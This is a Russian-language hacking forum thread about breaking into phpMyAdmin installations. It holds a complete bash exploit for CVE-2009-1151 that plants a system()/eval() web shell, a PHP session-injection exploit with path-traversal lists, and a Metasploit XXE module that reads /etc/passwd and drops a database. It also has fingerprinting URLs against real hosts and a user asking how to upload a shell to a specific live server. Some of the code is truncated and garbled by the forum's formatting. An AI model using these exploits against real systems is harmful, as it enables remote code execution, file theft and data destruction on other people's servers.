 |
|
17.12.2009, 02:15
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
С нами:
9600218
Репутация:
277
|
|
Сообщение от speles
как узнать точную версию phpMyAdmin
По changelog.php
Пример:
http://87.106.94.86/phpmyadmin/changelog.php
|
|
|
18.12.2009, 14:22
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
С нами:
9671366
Репутация:
332
|
|
Сообщение от oRb
Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
раскрытие путей в 3.* версиях
Fatal error: Call to undefined function pma_issuperuser() in /www/html/pma/libraries/check_user_privileges.lib.php on line 16
Проверялось на версии 3.2.0.1
XSS то они походу заделали, но как всегда получили что то другое, в нашем случае раскрытие путей 
|
|
|
|
17.03.2010, 01:48
|
|
Новичок
Регистрация: 14.01.2010
Сообщений: 5
С нами:
8591259
Репутация:
0
|
|
http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
имея такой доступ что можно зделать ? залить шел или слить базу какнибуть можно?
|
|
|
|
17.03.2010, 02:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
|
|
|
|
11.04.2010, 11:36
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
С нами:
8738995
Репутация:
1
|
|
Сообщение от omel
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi
if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function
cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`
# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi
# milw0rm.com [2009-06-09]
Блин, извиняюсь за глупый вопрос:
но чем запустить ?
под виндой?
|
|
|
|
11.04.2010, 15:55
|
|
Познающий
Регистрация: 07.08.2009
Сообщений: 36
С нами:
8822446
Репутация:
34
|
|
to:Sidarovich1975
Cygwin =)
|
|
|
|
10.05.2010, 09:55
|
|
Новичок
Регистрация: 02.05.2010
Сообщений: 1
С нами:
8436062
Репутация:
0
|
|
#!/bin/bash под виндой  Наврядли  |
|
|
|
12.07.2011, 11:01
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
[SIZE="3"]phpMyAdmin ';//PHP code to execute
/*Settings*/
/*-------------------------------------------EXPLOIT CODE-------------------------------------------*/
$count_redirects=0;
$max_redirects=5;
//отправляем http-данные
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, c ookie, useragent, other headers, timeout, wha t to show = (0-all, 1-body, 2-headers), redirect = 0|1
functionsend_data($method,$url,$data='',$referer_string='',$cookie_string='',$ua_string='Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9 .1.8) Gecko/20100202 Firefox/3.5.8',$other_headers='',$timeout=30,$show=0,$follow_redirect=0)
{
global$count_redirects,$max_redirects;
$return='';
$feof_count=0;
$parsed_url=parse_url($url);
$site=$parsed_url['host'];
$path=$parsed_url['path'];
$query=$parsed_url['query'];
if(preg_match('@_$@i',$query) && !preg_match('@_$@i',$url))
$query=rtrim($query,'_');
if(preg_match('@_$@i',$path) && !preg_match('@_$@i',$url))
$path=rtrim($path,'_');
($method=='GET'&& !empty($data)) ?$path.='?'.$data:'';
($method=='GET'&& !empty($query) && empty($data)) ?$path.='?'.$query:'';
($method=='POST'&& !empty($query)) ?$path.='?'.$query:'';
if($fp=fsockopen($site,80,$errno,$errstr,$timeout))
{
($method=='POST') ?$out="POST$pathHTTP/1.1\r\n":$out="GET$pathHTTP/1.1\r\n";
$out.="Host:$site\r\n";
$out.="Content-type: application/x-www-form-urlencoded\r\n";
$out.="Connection: Close\r\n";
$out.="User-Agent:$ua_string\r\n";
!empty($referer_string) ?$out.="Referer:$referer_string\r\n":'';
!empty($cookie_string) ?$out.="Cookie:$cookie_string\r\n":'';
!empty($other_headers) ?$out.=$other_headers:'';
($method=='POST') ?$out.="Content-Length: ".strlen($data)."\r\n\r\n":$out.="\r\n";
($method=='POST') ?fwrite($fp,$out.$data) :fwrite($fp,$out);
while (!feof($fp))
{
if($feof_count>=10000)
break;
$return.=fread($fp,4800);
++$feof_count;
}
fclose($fp);
if($follow_redirect)
{
if($count_redirects$errno,'errstr'=>$errstr);
}
$pmaurl=rtrim($pmaurl,'/').'/index.php';
//Regards to asddas
$sess_path= array('/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
'/shared/sessions',
'/var/php_sessions/',
'/var/sessions/',
'/tmp/php_sessions/',
'/tmp/sessions/',
'../../../tmp/',
'../../../../tmp/',
'../../../../../tmp/',
'../../../../../../tmp/',
'../../../../../../../tmp/',
'../../../temp/',
'../../../../temp/',
'../../../../../temp/',
'../../../../../../temp/',
'../../../../../../../temp/',
'../../../sessions/',
'../../../../sessions/',
'../../../../../sessions/',
'../../../../../../sessions/',
'../../../../../../../sessions/',
'../../../phptmp/',
'../../../../phptmp/',
'../../../../../phptmp/',
'../../../../../../phptmp/',
'../../../../../../../phptmp/');
//1. Token, Session name and Cookies
$token_page=send_data('GET',$pmaurl);
preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
$token=$token_array[1];
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
$cookie_array=$cookie_array[1];
$cookie_array=implode("; ",$cookie_array);
preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array);
$session=$session_array[1];
//2. Inject into session testing
$sess_test_page='';
$o=0;
$good_inj=false;
do
{
$inj=$sess_path[$o].'sess_'.$session;
$query=$pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s :'.strlen($inj).':"'.$inj.'";}}');
$sess_test_page=send_data('GET',$query,'',$pmaurl,$cookie_array);
$sess_test_page2=send_data('GET',$pmaurl.'?token='.$token,'',$pmaurl,$cookie_array);
if(stristr($sess_test_page2,'PMA_Config'))
{
$good_inj=$inj;
flush();
print'[+] '.$inj.' - good path
';
break;
}
else
{
flush();
print'[-] '.$inj.' - bad path
';
}
$o++;
}
while($o[COLOR="#007700"]
|
|
|
|
07.02.2012, 17:04
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
Код:
require 'msf/core'
class Metasploit3 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
'Version' => '1.0',
'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
The attacker must be logged in to MySQL via phpMyAdmin.
Works on Windows and Linux Versions 3.3.X and 3.4.X},
'References' =>
[
[ 'CVE', '2011-4107' ],
[ 'OSVDB', '76798' ],
[ 'BID', '50497' ],
[ 'URL', 'http://secforce.com/research/'],
],
'Author' => [ 'Marco Batista' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password']),
OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
],self.class)
end
def loginprocess
# HTTP GET TO GET SESSION VALUES
getresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'GET',
'version' => '1.1',
}, 25)
if (getresponse.nil?)
print_error("no response for #{ip}:#{rport}")
elsif (getresponse.code == 200)
print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
print_status("Received 302 to #{getresponse.headers['Location']}")
else
print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
end
valuesget = getresponse.headers["Set-Cookie"]
varsget = valuesget.split(" ")
#GETTING THE VARIABLES NEEDED
phpMyAdmin = varsget.grep(/phpMyAdmin/).last
pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
# END HTTP GET
# LOGIN POST REQUEST TO GET COOKIE VALUE
postresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'application/x-www-form-urlencoded',
'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
},
'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
}, 25)
if (postresponse["Location"].nil?)
print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
else
tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
end
valuespost = postresponse.headers["Set-Cookie"]
varspost = valuespost.split(" ")
#GETTING THE VARIABLES NEEDED
pmaUser = varspost.grep(/pmaUser-1/).last
pmaPass = varspost.grep(/pmaPass-1/).last
return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
# END OF LOGIN POST REQUEST
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
print_error(e.message)
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
print_error(e.message)
end
def readfile(cookie,tokenvalue)
#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
getfiles = send_request_cgi({
'uri' => datastore['APP']+'/export.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
}, 25)
if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
print_error("Error reading the file... not enough privilege? login error?")
else
print_status("#{getfiles.body}")
end
end
def dropdatabase(cookie,tokenvalue)
dropdb = send_request_cgi({
'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
'method' => 'GET',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
}, 25)
print_status("Dropping database: "+datastore['DB'])
end
def run
cookie,tokenvalue = loginprocess()
print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")
craftedXML = "------WebKitFormBoundary3XPL01T\n"
craftedXML \n"
craftedXML ]>\n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML \n"
craftedXML &conteudo;\n"
craftedXML \n"
craftedXML \n"
craftedXML \n\n"
craftedXML datastore['APP']+'/import.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
'Cookie' => cookie
},
'data' => craftedXML
}, 25)
readfile(cookie,tokenvalue)
if (datastore['DROP'] == "true")
dropdatabase(cookie,tokenvalue)
else
print_status("Database was not dropped: "+datastore['DB'])
end
end
end
http://1337day.com/exploits/17376
P.S. Date: 12-01-2012
|
|
|
|
15.04.2012, 16:13
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 0
С нами:
8908443
Репутация:
0
|
|
Сообщение от ph1l1ster
Код:
calendar.php?GLOBALS
иожно узнать точную версию, если > 3.* Часто мануалы не удаляют, а зря. Можно и так версию определить
.../phpmyadmin/Documentation.html
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
